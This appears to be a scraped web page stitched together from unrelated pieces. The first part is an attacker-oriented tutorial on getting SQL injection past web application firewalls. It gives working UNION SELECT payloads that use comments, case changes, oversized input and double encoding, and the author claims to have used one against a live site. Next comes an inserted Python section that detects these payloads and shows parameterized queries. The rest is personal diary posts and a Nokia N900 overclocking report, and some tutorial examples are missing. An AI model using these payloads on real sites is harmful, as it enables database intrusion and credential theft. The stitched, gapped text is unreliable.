Bypassing WAF Filters in SQLi


Now I'm going to show how to bypass WAF filters.

Before all, make sure you have knowledge of SQLi.

OK, let's start.

What is a WAF or Web Application Firewall?

-A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Some websites are using WAF filters.

If you find a vulnerable site that has a WAF and you try to inject a Union-based query and it shows Not Acceptable, 403 Forbidden or Web Application Firewall ALERT, that means the query or syntax that you injected is filtered or blocked by the WAF.

OK, now here are some methods to bypass WAF filters.


1)Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of web application firewalls and to kill certain SQL statements to execute the attacker's commands while commenting out the actual legitimate query. Some comments in SQL:

//, -- , /**/, #, --+, -- -, ;

2)Case Changing:

Some WAFs will filter only lowercase attacks. As we can see, we can easily evade this by case changing:

Possible Regex filter:


id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)

3)Inline Comments:

Some WAFs filter keywords like /union\sselect/ig. We can bypass this filter by using inline comments most of the time; more complex examples will require a more advanced approach, like adding SQL keywords that will further separate the two words:


Take notice of the exclamation point in /*!code*/: the exclamation point makes the SQL statement inside the comment execute.

Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can add more inline comments. For example, let's pretend a site filters union, where, table_name, table_schema, =, and information_schema. These are 3 statements we need to inject into our target.

For this we would:

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()' --

The above code would bypass the filter. Notice we can use 'like' instead of '='.

Another way to use inline comments: when everything seems to fail, you can try to throw the application firewall off by crafting a SQL statement using variables:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()' --

The above code should bypass the union+select filters even where common inline comments didn't work.

4)Buffer Overflow / Unexpected input:

A lot of WAFs are written in the C language, making them prone to overflow or to act differently when loaded with a bunch of data. Here is a WAF that does its job correctly, but when given a large amount of data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26


This bypass above works. I myself just used this against a Web site recently.

5)Replaced keywords (preg_replace and/or WAFs with the same action):

Sometimes an application will remove all of a keyword. For instance, let's say we have a filter that replaces union select with whitespace. We could bypass that filter like so:


As you can see, once union+select has been removed our capital UNION+SELECT takes its place, successfully injecting our query:


6)Character encoding:

Most WAFs will decode and filter an application's input, but some WAFs only decode the input once, so double encoding can bypass certain filters: the WAF decodes the input once and then filters, while the application keeps decoding the SQL statement and executes our code.

Examples of double encoding:

id=1%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/1,2,password%2f%2a*/FROM%2f%2a*/Users'+

[# Tut By Pain006 ]
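For the defender's side of the techniques above, here is an added Python example (it is not part of the original tutorial): a small canonicalizer that URL-decodes a request value until it stops changing, drops block comments (keeping the body of MySQL's /*! ... */ form, which the engine executes), folds case and collapses whitespace before the rule runs. The page's own payloads then match the same union\s+select rule that misses them when it is applied to the raw string, and the benign sample does not. The block ends with the parameterized query that makes the whole list moot. The sample query strings, the in-memory sqlite3 users table and the MAX_DECODE_ROUNDS bound are constructed for this example.

```python
import re
import sqlite3
import urllib.parse

# Constructed sample query strings. The first five are the page's own evasion
# payloads trimmed to the part that matters; "double_enc" is constructed here
# to exercise repeated decoding; the last two are benign controls.
SAMPLES = {
    "plain":        ("id=1 union select 1,2,3", True),
    "case+comment": ("id=1+UnIoN/**/SeLeCT+1,2,3", True),
    "mysql_bang":   ("id=1/*!UnIoN*/+SeLeCT+1,2,3", True),
    "fake_param":   ("id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3", True),
    "encoded":      ("id=1%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/1,2", True),
    "double_enc":   ("id=1%2520union%2520select%25201,2,3", True),
    "benign_id":    ("id=42", False),
    "benign_words": ("q=union+station+select+board", False),
}

# The signature a naive WAF rule might use: the two keywords separated by
# whitespace, matched against whatever string it is handed.
NAIVE_RULE = re.compile(r"union\s+select", re.IGNORECASE)

MAX_DECODE_ROUNDS = 3  # constructed bound; stops decode loops on hostile input


def canonicalize(raw: str) -> str:
    """Reduce a query string to the form the database engine would see."""
    # 1. Decode until the value stops changing (bounded), so a value that was
    #    percent-encoded twice is inspected in its final form.
    s = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = urllib.parse.unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    # 2. MySQL executes the body of /*! ... */, so keep the body; any other
    #    block comment is ignored by the engine, so it becomes a separator.
    s = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # 3. Case-fold and collapse whitespace so UnIoN and union compare equal.
    return " ".join(s.lower().split())


def naive_match(raw: str) -> bool:
    """Rule applied to the raw string, as a WAF that does not canonicalize would."""
    return NAIVE_RULE.search(raw) is not None


def canonical_match(raw: str) -> bool:
    """Same rule applied after canonicalization."""
    return NAIVE_RULE.search(canonicalize(raw)) is not None


def evaluate() -> dict:
    """Per-sample results as (expected, naive_rule_hit, canonical_rule_hit)."""
    return {name: (exp, naive_match(q), canonical_match(q))
            for name, (q, exp) in SAMPLES.items()}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the 'users' lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_user(conn: sqlite3.Connection, raw_id: str) -> list:
    """The fix that makes every technique above moot: the request value is
    bound as a parameter, so the engine never parses it as SQL."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (raw_id,)).fetchall()
    return [name for (name,) in rows]


if __name__ == "__main__":
    for name, (exp, naive, canon) in evaluate().items():
        print(f"{name:14} expected={exp!s:5} naive={naive!s:5} canonical={canon}")
    conn = make_db()
    print(lookup_user(conn, "1"))
    # The page's /*!UnIoN*/ payload is compared as data and matches no row.
    print(lookup_user(conn, SAMPLES["mysql_bang"][0].split("=", 1)[1]))
```

The point of the comparison is that the rule itself never changes; only where it is applied does. Keep the decode loop bounded, and remember that canonicalization is a detection aid, not a fix: the bound parameter in lookup_user is what removes the injection.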

When you get an error at a number, that number will be ONE TOO MUCH, so don't count it.

For example, order by 8 <= no error | order by 9 <= error, then we have 8 columns, and it will be union all select 1,2,3,4,5,6,7,8-- -


16 Jamadil-Awwal 1436 Hijriyyah.

Peace be upon you, and the mercy and blessings of Allah.

Alhamdulillah, thanks be to God, for by His grace I am still given breath to continue life on His earth, to keep striving to perform the acts of worship that have been commanded... still given the strength to stand, still given a strong heart to understand, still able to walk and still able to type a word or two in this public diary of mine that has so many shortcomings.

Today marks exactly 29 years since I was born. Only Allah knows what my life has been like over the 7 years in the city of Kuala Lumpur. I want to wish a happy birthday to my friends who are celebrating their birthdays on this 6th of March, namely Aida, Akma and Faridah... May you always be blessed by Allah s.w.t., showered with abundant provision, granted lasting health, and blessed with a long life.

I am grateful to God for blessing me with a family that loves me, friends who always help me in hard times, comrades from MML, MPI, SMKDAM, UiTM and UniKL (sorry, I won't name you all)... And not forgetting my beloved Afzan, who is always behind me (even if sometimes she is in front of me). I will always keep you all in my prayers.



Posted from Nokia N900

Just updated

Greetings, gang...

I feel like it's been a really long time since I updated anything here... huhu... of course, it's the never-ending busyness... and now I've moved up from technician to network engineer... ALHAMDULILLAH... more blessings... maybe I can get married a bit sooner... kikiki... and to the MIIT kids, seriously, I feel like I want to meet you all... hang out and laugh like before... haish... my childish ways never end, right... but that's me... hehe... even when I have kids later I'll still behave like this...

Sometimes I also wonder where Hekmah Sengal, Dayah, Mira, Shah, Ayoi, Kiko, Ijat Pacat, Bana, Mamu and everyone have disappeared to... I only see their updates on Facebook... blink and it's already 2014... and almost February already... so many things have 'happened' over these 2 years... and most importantly it's Cik Are who is always by my side through thick and thin... haha...

As I'm typing this, I'm at KLIA2... taking a short break, I've travelled far today... this is what life on a project is like... feels like no life at all... all I know is the site during the day and home at night... when the body is tired and the brain is exhausted, there's really no time to think about this blog... I flipped back through my blogs from the early days of getting acquainted with blogging... huhu... my blogspot is still there... I thought I'd deleted it for certain reasons... but it hasn't disappeared from the internet... Mr. Amran, could you teach me to hack this internet server... Master Bana, help out too...

To my friend Cik Dayah, when are we going to eat corn porridge???????

To my BFF, Cik Nora, when are you coming back to Malaysia??? Let me know when you're back... you didn't even tell me when you left the other day...

I'll spend my time in the village next week celebrating Raya... hehe. Sleeping on the beach at night would be nice too... release tension... I need to think about what my next step is... so many things I want to do... haha... so, that's all for now... have to get back to work...



I am currently using the Linux kernel and the desktop widget MaxCPU to quickly overclock or reduce CPU usage on my Nokia N900. MaxCPU has a range starting at 250MHz with levels at 500MHz, 550MHz, 600MHz (default), 700MHz, 750MHz, 805MHz, 850MHz, 900MHz, 950MHz, 1000MHz, 1100MHz and 1150MHz.

I am not quite sure what the limit is for the Nokia N900, since I have been pushing it for quite some time, but I think I have reached a milestone in numbers. Currently my setup is:

  • Version 20.2010.36.2 (PR1.3).
  • 9 unique desktops.
  • 81 desktop shortcuts.
  • 22 loaded widgets (CPU x 3, Touch Search, Desktop Browser x 9, Conversations, Queen Beacon x 4, Calendar, Forca Weather, OMWeather, Feeding it).
  • 95 245 applications in the menu. (edit: 19/06/2011).
  • Overclocked to 1000MHz and stable.

Overclocking the N900 makes all the difference in performance, although it can cause the device to be quite unstable if the wrong configuration is used, so it takes a lot of patience and fiddling to get the right set up.

Some of the resources I have used to date for overclocking:

  1. Jakiman’s N900 Overclocking Guide – This is a brilliant guide and works exactly as the steps suggest.
  2. Titan – more configuration options. Very useful if you want to add your own settings.
  3. Tonism – offers the latest starving configuration for titan kernel!
  4. Jakiman offers some extra steps for setting the same MIN and MAX settings (e.g. 1000 1000). These are the settings I applied after I successfully completed step 1 and they work brilliantly. My N900 is super fast now and surprisingly very stable. I managed to open 56 applications (before it started to falter).
  5. Queen Beacon Widget – This widget is amazing in its own right but is key to the overclocking process.
  6. Bakuur has a complete step by step guide on overclocking and using the Queen Beacon Widget (with diagrams). – Very cool!
  7. Jakiman’s name pops up again and here is his guide to using Queen Beacon and overclocking. – This is what I used and it works!
  8. Lehto is another cool customer overclocking his N900 and reporting on the different speeds achieved.
  9. Finally all these brilliant people can be found at Maemo.org in the forums sharing their knowledge and it should be the place where you go first to read up on Overclocking the N900. This topic has managed to generate 495 pages so far, which just goes to show how popular this topic is.

Below are ten large (content heavy) websites that I loaded up with ease with my 1000MHz setup.

The screen below shows the CPU widget showing 1000MHz. I have fixed the MIN and MAX to 1000MHz. I was running my N900 all day at 1000MHz and it was fast, very responsive, and an absolute pleasure to use.